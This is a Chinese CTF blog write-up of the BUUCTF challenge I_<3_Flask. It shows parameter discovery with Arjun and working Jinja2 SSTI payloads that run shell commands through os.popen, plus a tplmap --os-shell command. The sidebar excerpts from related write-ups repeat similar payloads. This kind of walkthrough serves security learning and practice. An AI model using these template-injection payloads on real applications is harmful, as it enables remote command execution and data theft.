BUUCTF RootersCTF2019]I_<3_Flask

最新推荐文章于 2023-07-17 15:21:09 发布
最新推荐文章于 2023-07-17 15:21:09 发布
阅读量303 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyhdl666/article/details/114917868
版权

文章目录

手注

  • 刚进入题目 知道是SSTI注入 但是没找到注入点
  • 学到了一个新的工具 Arjun
    在这里插入图片描述
  • 扫描到get参数name
  • ?name={{'aaa'.upper()}}
    在这里插入图片描述
  • 确定是SSTI注入
  • 构造payload:
{% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% endif %}{% endfor %}

在这里插入图片描述

  • 获取flag
{% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('cat flag.txt').read()}}{% endif %}{% endfor %}
  • 也可以用python自带的魔法函数去进行SSTI注入
    payload:
?name={{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

tplmap

python tplmap.py -u http://c19debfb-5c8c-45c7-86f8-49f15f2a6301.node3.buuoj.cn/?name= --os-shell

在这里插入图片描述

  • 这道题没有过滤直接就可以拿Flag了
海上清辉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
RootersCTF2019 I ♥ Flask
汗的博客
08-29 480
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
paddleOCR_flask_web服务化.rar
08-20
【标题】"paddleOCR_flask_web服务化.rar" 是一个使用PaddleOCR与Flask框架构建的Web服务项目,其主要目标是提供一个能够通过Web接口进行图像文字识别的服务。PaddleOCR是一款由阿里云开发的开源OCR(Optical ...
[RootersCTF2019]I_3_Flask
feng的博客
03-06 363
WP 一道简单的SSTI,主要的难点还是找注入的参数。 学习了利用arjun这个HTTP参数发现工具: Arjun 发现注入点是name参数。 然后简单的SSTI一下就可以了: ?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}} ...
BUUCTF [RootersCTF2019] I_3_Flask
Senimo
12-19 1219
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
os模块
qq_45594312的博客
01-11 161
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
第三次课c3.zip_flask_flask网站_网站 python
09-23
在本课程中,我们将深入探讨如何使用Python的Flask框架构建一个类似Instagram的网站。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,它以其灵活性和简洁性而受到开发者的喜爱。这个“第三次课c3.zip”...
douban_flask_pythonflask豆瓣_python_
10-02
标题 "douban_flask_pythonflask豆瓣_python_" 暗示了这是一个使用 Python 的 Flask 框架来实现的项目,目标是爬取并处理豆瓣电影Top250的数据。Flask是一个轻量级的Web服务程序,适合用于构建小型到中型的Web应用。...
toutiao-backend_Flask框架_flask_
09-30
3. **用户体验**:前端界面设计应简洁易用,可能使用了Bootstrap、Vue.js或React.js等前端框架与Flask进行交互,实现动态加载和交互效果。 4. **性能优化**:随着用户量的增长,可能需要考虑缓存策略(如Redis)、...
Flask框架通过Flask_login实现用户登录功能示例
09-20
在本文中,我们将深入探讨如何使用Flask框架和Flask_Login扩展来实现用户登录功能。Flask是一个轻量级的Python Web服务器网关接口(WSGI)应用框架,而Flask_Login则是一个专为Flask设计的用户身份验证库,它简化了...
Python-Arjun是一个用于查找隐藏的GET和POST参数的python脚本
08-10
Arjun是一个python脚本,用于使用regex和bruteforce查找隐藏的GET和POST参数。
强大的端口扫描工具! 绝对无毒绿色!
07-13
强大的端口扫描工具! 绝对无毒绿色!快来下载,无毒!
BUUCTF-[RootersCTF2019]I_3_Flask
最新发布
weixin_49803180的博客
07-17 233
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
BUUCTF--[RootersCTF2019]I_3_Flask
qq_46263951的博客
07-15 283
进入页面后发现并没有什么可以利用的地方 利用Arjun扫描可以得到一个参数name 接下来要利用SSTI模板注入 尝试模板注入,发现可以成功执行 ?name={{8*8}} 方法一: 直接可以利用此漏洞执行payload ?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}} 方法二: 使用tplmap,可以得到是存在jinjia2模版注入再进行getshell即可拿到flag 由于我这边...
[RootersCTF2019]I_3_Flask 1&arjun爆破参数
plant1234的博客
10-04 1587
根据测试发现有ssti模板注入。
[RootersCTF2019]I_3_Flask(参数爆破工具arjun)
qq_44657899的博客
08-16 1642
arjun安装 下载地址 s0md3v /Arjun cd Arjun-2.1.4 pip3 install arjun py -3 setup.py install 如果输入arjun -h有如下输出则安装成功 解题 首先使用arjun爆破参数 arjun -u http://aac8b7e4-008f-486a-9642-232db8c62642.node4.buuoj.cn:81/ -c 100 -d 5 参数: -d DELAY Delay between requests in secon
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值